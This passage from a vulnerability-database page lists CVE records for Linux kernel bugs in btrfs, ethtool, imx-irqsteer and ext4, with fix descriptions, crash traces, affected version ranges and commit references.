Unaffected: 0 , < 6.7 (semver)
Unaffected: 6.9.11 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:46:52.378Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/17d1fd302a53d7e456a7412da74be74a0cf63a72"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2c49908634a2b97b1c3abe0589be2739ac5e7fd5"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41067",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:21:49.560093Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:00.426Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/scrub.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "17d1fd302a53d7e456a7412da74be74a0cf63a72",
              "status": "affected",
              "version": "9acaa64187f9b4cbb75622883c96ea1a893d5431",
              "versionType": "git"
            },
            {
              "lessThan": "2c49908634a2b97b1c3abe0589be2739ac5e7fd5",
              "status": "affected",
              "version": "9acaa64187f9b4cbb75622883c96ea1a893d5431",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/scrub.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.7"
            },
            {
              "lessThan": "6.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.11",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: scrub: handle RST lookup error correctly\n\n[BUG]\nWhen running btrfs/060 with forced RST feature, it would crash the\nfollowing ASSERT() inside scrub_read_endio():\n\n\tASSERT(sector_nr \u003c stripe-\u003enr_sectors);\n\nBefore that, we would have tree dump from\nbtrfs_get_raid_extent_offset(), as we failed to find the RST entry for\nthe range.\n\n[CAUSE]\nInside scrub_submit_extent_sector_read() every time we allocated a new\nbbio we immediately called btrfs_map_block() to make sure there was some\nRST range covering the scrub target.\n\nBut if btrfs_map_block() fails, we immediately call endio for the bbio,\nwhile the bbio is newly allocated, it\u0027s completely empty.\n\nThen inside scrub_read_endio(), we go through the bvecs to find\nthe sector number (as bi_sector is no longer reliable if the bio is\nsubmitted to lower layers).\n\nAnd since the bio is empty, such bvecs iteration would not find any\nsector matching the sector, and return sector_nr == stripe-\u003enr_sectors,\ntriggering the ASSERT().\n\n[FIX]\nInstead of calling btrfs_map_block() after allocating a new bbio, call\nbtrfs_map_block() first.\n\nSince our only objective of calling btrfs_map_block() is only to update\nstripe_len, there is really no need to do that after btrfs_alloc_bio().\n\nThis new timing would avoid the problem of handling empty bbio\ncompletely, and in fact fixes a possible race window for the old code,\nwhere if the submission thread is the only owner of the pending_io, the\nscrub would never finish (since we didn\u0027t decrease the pending_io\ncounter).\n\nAlthough the root cause of RST lookup failure still needs to be\naddressed."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:37:33.893Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/17d1fd302a53d7e456a7412da74be74a0cf63a72"
        },
        {
          "url": "https://git.kernel.org/stable/c/2c49908634a2b97b1c3abe0589be2739ac5e7fd5"
        }
      ],
      "title": "btrfs: scrub: handle RST lookup error correctly",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-41067",
    "datePublished": "2024-07-29T14:57:28.543Z",
    "dateReserved": "2024-07-12T12:17:45.630Z",
    "dateUpdated": "2026-01-05T10:37:33.893Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-46679 (GCVE-0-2024-46679)

Vulnerability from cvelistv5 – Published: 2024-09-13 05:29 – Updated: 2025-11-03 22:16

Title

ethtool: check device is present when getting link settings

Summary

In the Linux kernel, the following vulnerability has been resolved: ethtool: check device is present when getting link settings A sysfs reader can race with a device reset or removal, attempting to read device state when the device is not actually present. eg: [exception RIP: qed_get_current_link+17] #8 [ffffb9e4f2907c48] qede_get_link_ksettings at ffffffffc07a994a [qede] #9 [ffffb9e4f2907cd8] __rh_call_get_link_ksettings at ffffffff992b01a3 #10 [ffffb9e4f2907d38] __ethtool_get_link_ksettings at ffffffff992b04e4 #11 [ffffb9e4f2907d90] duplex_show at ffffffff99260300 #12 [ffffb9e4f2907e38] dev_attr_show at ffffffff9905a01c #13 [ffffb9e4f2907e50] sysfs_kf_seq_show at ffffffff98e0145b #14 [ffffb9e4f2907e68] seq_read at ffffffff98d902e3 #15 [ffffb9e4f2907ec8] vfs_read at ffffffff98d657d1 #16 [ffffb9e4f2907f00] ksys_read at ffffffff98d65c3f #17 [ffffb9e4f2907f38] do_syscall_64 at ffffffff98a052fb crash> struct net_device.state ffff9a9d21336000 state = 5, state 5 is __LINK_STATE_START (0b1) and __LINK_STATE_NOCARRIER (0b100). The device is not present, note lack of __LINK_STATE_PRESENT (0b10). This is the same sort of panic as observed in commit 4224cfd7fb65 ("net-sysfs: add check for netdevice being present to speed_show"). There are many other callers of __ethtool_get_link_ksettings() which don't have a device presence check. Move this check into ethtool to protect all callers.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ec7b4f7f644018ac2…
	https://git.kernel.org/stable/c/842a40c7273ba1c1c…
	https://git.kernel.org/stable/c/7a8d98b6d6484d3ad…
	https://git.kernel.org/stable/c/9bba5955eed160102…
	https://git.kernel.org/stable/c/94ab317024ba373d3…
	https://git.kernel.org/stable/c/1d6d9b5b1b95bfecc…
	https://git.kernel.org/stable/c/a699781c79ecf6cfe…

Impacted products

Vendor

Product

Version

Linux

Affected: d519e17e2d01a0ee9abe083019532061b4438065 , < ec7b4f7f644018ac293cb1b02528a40a32917e62 (git)
Affected: d519e17e2d01a0ee9abe083019532061b4438065 , < 842a40c7273ba1c1cb30dda50405b328de1d860e (git)
Affected: d519e17e2d01a0ee9abe083019532061b4438065 , < 7a8d98b6d6484d3ad358510366022da080c37cbc (git)
Affected: d519e17e2d01a0ee9abe083019532061b4438065 , < 9bba5955eed160102114d4cc00c3d399be9bdae4 (git)
Affected: d519e17e2d01a0ee9abe083019532061b4438065 , < 94ab317024ba373d37340893d1c0358638935fbb (git)
Affected: d519e17e2d01a0ee9abe083019532061b4438065 , < 1d6d9b5b1b95bfeccb84386a51b7e6c510ec13b2 (git)
Affected: d519e17e2d01a0ee9abe083019532061b4438065 , < a699781c79ecf6cfe67fb00a0331b4088c7c8466 (git)

Linux

Affected: 2.6.33
Unaffected: 0 , < 2.6.33 (semver)
Unaffected: 5.4.283 , ≤ 5.4.* (semver)
Unaffected: 5.10.225 , ≤ 5.10.* (semver)
Unaffected: 5.15.166 , ≤ 5.15.* (semver)
Unaffected: 6.1.108 , ≤ 6.1.* (semver)
Unaffected: 6.6.49 , ≤ 6.6.* (semver)
Unaffected: 6.10.8 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-46679",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-29T15:10:05.131175Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-29T15:10:19.475Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:16:20.039Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/core/net-sysfs.c",
            "net/ethtool/ioctl.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ec7b4f7f644018ac293cb1b02528a40a32917e62",
              "status": "affected",
              "version": "d519e17e2d01a0ee9abe083019532061b4438065",
              "versionType": "git"
            },
            {
              "lessThan": "842a40c7273ba1c1cb30dda50405b328de1d860e",
              "status": "affected",
              "version": "d519e17e2d01a0ee9abe083019532061b4438065",
              "versionType": "git"
            },
            {
              "lessThan": "7a8d98b6d6484d3ad358510366022da080c37cbc",
              "status": "affected",
              "version": "d519e17e2d01a0ee9abe083019532061b4438065",
              "versionType": "git"
            },
            {
              "lessThan": "9bba5955eed160102114d4cc00c3d399be9bdae4",
              "status": "affected",
              "version": "d519e17e2d01a0ee9abe083019532061b4438065",
              "versionType": "git"
            },
            {
              "lessThan": "94ab317024ba373d37340893d1c0358638935fbb",
              "status": "affected",
              "version": "d519e17e2d01a0ee9abe083019532061b4438065",
              "versionType": "git"
            },
            {
              "lessThan": "1d6d9b5b1b95bfeccb84386a51b7e6c510ec13b2",
              "status": "affected",
              "version": "d519e17e2d01a0ee9abe083019532061b4438065",
              "versionType": "git"
            },
            {
              "lessThan": "a699781c79ecf6cfe67fb00a0331b4088c7c8466",
              "status": "affected",
              "version": "d519e17e2d01a0ee9abe083019532061b4438065",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/core/net-sysfs.c",
            "net/ethtool/ioctl.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.33"
            },
            {
              "lessThan": "2.6.33",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.283",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.225",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.166",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.108",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.49",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.283",
                  "versionStartIncluding": "2.6.33",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.225",
                  "versionStartIncluding": "2.6.33",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.166",
                  "versionStartIncluding": "2.6.33",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.108",
                  "versionStartIncluding": "2.6.33",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.49",
                  "versionStartIncluding": "2.6.33",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.8",
                  "versionStartIncluding": "2.6.33",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "2.6.33",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nethtool: check device is present when getting link settings\n\nA sysfs reader can race with a device reset or removal, attempting to\nread device state when the device is not actually present. eg:\n\n     [exception RIP: qed_get_current_link+17]\n  #8 [ffffb9e4f2907c48] qede_get_link_ksettings at ffffffffc07a994a [qede]\n  #9 [ffffb9e4f2907cd8] __rh_call_get_link_ksettings at ffffffff992b01a3\n #10 [ffffb9e4f2907d38] __ethtool_get_link_ksettings at ffffffff992b04e4\n #11 [ffffb9e4f2907d90] duplex_show at ffffffff99260300\n #12 [ffffb9e4f2907e38] dev_attr_show at ffffffff9905a01c\n #13 [ffffb9e4f2907e50] sysfs_kf_seq_show at ffffffff98e0145b\n #14 [ffffb9e4f2907e68] seq_read at ffffffff98d902e3\n #15 [ffffb9e4f2907ec8] vfs_read at ffffffff98d657d1\n #16 [ffffb9e4f2907f00] ksys_read at ffffffff98d65c3f\n #17 [ffffb9e4f2907f38] do_syscall_64 at ffffffff98a052fb\n\n crash\u003e struct net_device.state ffff9a9d21336000\n    state = 5,\n\nstate 5 is __LINK_STATE_START (0b1) and __LINK_STATE_NOCARRIER (0b100).\nThe device is not present, note lack of __LINK_STATE_PRESENT (0b10).\n\nThis is the same sort of panic as observed in commit 4224cfd7fb65\n(\"net-sysfs: add check for netdevice being present to speed_show\").\n\nThere are many other callers of __ethtool_get_link_ksettings() which\ndon\u0027t have a device presence check.\n\nMove this check into ethtool to protect all callers."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:31:44.156Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ec7b4f7f644018ac293cb1b02528a40a32917e62"
        },
        {
          "url": "https://git.kernel.org/stable/c/842a40c7273ba1c1cb30dda50405b328de1d860e"
        },
        {
          "url": "https://git.kernel.org/stable/c/7a8d98b6d6484d3ad358510366022da080c37cbc"
        },
        {
          "url": "https://git.kernel.org/stable/c/9bba5955eed160102114d4cc00c3d399be9bdae4"
        },
        {
          "url": "https://git.kernel.org/stable/c/94ab317024ba373d37340893d1c0358638935fbb"
        },
        {
          "url": "https://git.kernel.org/stable/c/1d6d9b5b1b95bfeccb84386a51b7e6c510ec13b2"
        },
        {
          "url": "https://git.kernel.org/stable/c/a699781c79ecf6cfe67fb00a0331b4088c7c8466"
        }
      ],
      "title": "ethtool: check device is present when getting link settings",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-46679",
    "datePublished": "2024-09-13T05:29:13.450Z",
    "dateReserved": "2024-09-11T15:12:18.248Z",
    "dateUpdated": "2025-11-03T22:16:20.039Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-42290 (GCVE-0-2024-42290)

Vulnerability from cvelistv5 – Published: 2024-08-17 09:08 – Updated: 2025-11-03 22:03

Title

irqchip/imx-irqsteer: Handle runtime power management correctly

Summary

In the Linux kernel, the following vulnerability has been resolved: irqchip/imx-irqsteer: Handle runtime power management correctly The power domain is automatically activated from clk_prepare(). However, on certain platforms like i.MX8QM and i.MX8QXP, the power-on handling invokes sleeping functions, which triggers the 'scheduling while atomic' bug in the context switch path during device probing: BUG: scheduling while atomic: kworker/u13:1/48/0x00000002 Call trace: __schedule_bug+0x54/0x6c __schedule+0x7f0/0xa94 schedule+0x5c/0xc4 schedule_preempt_disabled+0x24/0x40 __mutex_lock.constprop.0+0x2c0/0x540 __mutex_lock_slowpath+0x14/0x20 mutex_lock+0x48/0x54 clk_prepare_lock+0x44/0xa0 clk_prepare+0x20/0x44 imx_irqsteer_resume+0x28/0xe0 pm_generic_runtime_resume+0x2c/0x44 __genpd_runtime_resume+0x30/0x80 genpd_runtime_resume+0xc8/0x2c0 __rpm_callback+0x48/0x1d8 rpm_callback+0x6c/0x78 rpm_resume+0x490/0x6b4 __pm_runtime_resume+0x50/0x94 irq_chip_pm_get+0x2c/0xa0 __irq_do_set_handler+0x178/0x24c irq_set_chained_handler_and_data+0x60/0xa4 mxc_gpio_probe+0x160/0x4b0 Cure this by implementing the irq_bus_lock/sync_unlock() interrupt chip callbacks and handle power management in them as they are invoked from non-atomic context. [ tglx: Rewrote change log, added Fixes tag ]

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/a590e8dea3df26399…
	https://git.kernel.org/stable/c/3a2884a44e5cda192…
	https://git.kernel.org/stable/c/fa1803401e1c360ef…
	https://git.kernel.org/stable/c/58c56735facb225a5…
	https://git.kernel.org/stable/c/21bd3f9e7f924cd2f…
	https://git.kernel.org/stable/c/f8ae38f1dfe652779…
	https://git.kernel.org/stable/c/33b1c47d1fc0b5f06…

Impacted products

Vendor

Product

Version

Linux

Affected: 0136afa08967f6e160b9b4e85a7a70e4180a8333 , < a590e8dea3df2639921f874d763be961dd74e8f9 (git)
Affected: 0136afa08967f6e160b9b4e85a7a70e4180a8333 , < 3a2884a44e5cda192df1b28e9925661f79f599a1 (git)
Affected: 0136afa08967f6e160b9b4e85a7a70e4180a8333 , < fa1803401e1c360efe6342fb41d161cc51748a11 (git)
Affected: 0136afa08967f6e160b9b4e85a7a70e4180a8333 , < 58c56735facb225a5c46fa4b8bbbe7f31d1cb894 (git)
Affected: 0136afa08967f6e160b9b4e85a7a70e4180a8333 , < 21bd3f9e7f924cd2fc892a484e7a50c7e1847565 (git)
Affected: 0136afa08967f6e160b9b4e85a7a70e4180a8333 , < f8ae38f1dfe652779c7c613facbc257cec00ac44 (git)
Affected: 0136afa08967f6e160b9b4e85a7a70e4180a8333 , < 33b1c47d1fc0b5f06a393bb915db85baacba18ea (git)

Linux

Affected: 5.0
Unaffected: 0 , < 5.0 (semver)
Unaffected: 5.4.282 , ≤ 5.4.* (semver)
Unaffected: 5.10.224 , ≤ 5.10.* (semver)
Unaffected: 5.15.165 , ≤ 5.15.* (semver)
Unaffected: 6.1.103 , ≤ 6.1.* (semver)
Unaffected: 6.6.44 , ≤ 6.6.* (semver)
Unaffected: 6.10.3 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42290",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:11:06.963924Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:33:29.783Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:03:46.700Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/irqchip/irq-imx-irqsteer.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "a590e8dea3df2639921f874d763be961dd74e8f9",
              "status": "affected",
              "version": "0136afa08967f6e160b9b4e85a7a70e4180a8333",
              "versionType": "git"
            },
            {
              "lessThan": "3a2884a44e5cda192df1b28e9925661f79f599a1",
              "status": "affected",
              "version": "0136afa08967f6e160b9b4e85a7a70e4180a8333",
              "versionType": "git"
            },
            {
              "lessThan": "fa1803401e1c360efe6342fb41d161cc51748a11",
              "status": "affected",
              "version": "0136afa08967f6e160b9b4e85a7a70e4180a8333",
              "versionType": "git"
            },
            {
              "lessThan": "58c56735facb225a5c46fa4b8bbbe7f31d1cb894",
              "status": "affected",
              "version": "0136afa08967f6e160b9b4e85a7a70e4180a8333",
              "versionType": "git"
            },
            {
              "lessThan": "21bd3f9e7f924cd2fc892a484e7a50c7e1847565",
              "status": "affected",
              "version": "0136afa08967f6e160b9b4e85a7a70e4180a8333",
              "versionType": "git"
            },
            {
              "lessThan": "f8ae38f1dfe652779c7c613facbc257cec00ac44",
              "status": "affected",
              "version": "0136afa08967f6e160b9b4e85a7a70e4180a8333",
              "versionType": "git"
            },
            {
              "lessThan": "33b1c47d1fc0b5f06a393bb915db85baacba18ea",
              "status": "affected",
              "version": "0136afa08967f6e160b9b4e85a7a70e4180a8333",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/irqchip/irq-imx-irqsteer.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.0"
            },
            {
              "lessThan": "5.0",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.282",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.224",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.165",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.103",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.44",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.282",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.224",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.165",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.103",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.44",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.3",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "5.0",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nirqchip/imx-irqsteer: Handle runtime power management correctly\n\nThe power domain is automatically activated from clk_prepare(). However, on\ncertain platforms like i.MX8QM and i.MX8QXP, the power-on handling invokes\nsleeping functions, which triggers the \u0027scheduling while atomic\u0027 bug in the\ncontext switch path during device probing:\n\n BUG: scheduling while atomic: kworker/u13:1/48/0x00000002\n Call trace:\n  __schedule_bug+0x54/0x6c\n  __schedule+0x7f0/0xa94\n  schedule+0x5c/0xc4\n  schedule_preempt_disabled+0x24/0x40\n  __mutex_lock.constprop.0+0x2c0/0x540\n  __mutex_lock_slowpath+0x14/0x20\n  mutex_lock+0x48/0x54\n  clk_prepare_lock+0x44/0xa0\n  clk_prepare+0x20/0x44\n  imx_irqsteer_resume+0x28/0xe0\n  pm_generic_runtime_resume+0x2c/0x44\n  __genpd_runtime_resume+0x30/0x80\n  genpd_runtime_resume+0xc8/0x2c0\n  __rpm_callback+0x48/0x1d8\n  rpm_callback+0x6c/0x78\n  rpm_resume+0x490/0x6b4\n  __pm_runtime_resume+0x50/0x94\n  irq_chip_pm_get+0x2c/0xa0\n  __irq_do_set_handler+0x178/0x24c\n  irq_set_chained_handler_and_data+0x60/0xa4\n  mxc_gpio_probe+0x160/0x4b0\n\nCure this by implementing the irq_bus_lock/sync_unlock() interrupt chip\ncallbacks and handle power management in them as they are invoked from\nnon-atomic context.\n\n[ tglx: Rewrote change log, added Fixes tag ]"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:26:04.872Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/a590e8dea3df2639921f874d763be961dd74e8f9"
        },
        {
          "url": "https://git.kernel.org/stable/c/3a2884a44e5cda192df1b28e9925661f79f599a1"
        },
        {
          "url": "https://git.kernel.org/stable/c/fa1803401e1c360efe6342fb41d161cc51748a11"
        },
        {
          "url": "https://git.kernel.org/stable/c/58c56735facb225a5c46fa4b8bbbe7f31d1cb894"
        },
        {
          "url": "https://git.kernel.org/stable/c/21bd3f9e7f924cd2fc892a484e7a50c7e1847565"
        },
        {
          "url": "https://git.kernel.org/stable/c/f8ae38f1dfe652779c7c613facbc257cec00ac44"
        },
        {
          "url": "https://git.kernel.org/stable/c/33b1c47d1fc0b5f06a393bb915db85baacba18ea"
        }
      ],
      "title": "irqchip/imx-irqsteer: Handle runtime power management correctly",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42290",
    "datePublished": "2024-08-17T09:08:59.848Z",
    "dateReserved": "2024-07-30T07:40:12.268Z",
    "dateUpdated": "2025-11-03T22:03:46.700Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-43828 (GCVE-0-2024-43828)

Vulnerability from cvelistv5 – Published: 2024-08-17 09:21 – Updated: 2025-11-03 22:05

Title

ext4: fix infinite loop when replaying fast_commit

Summary

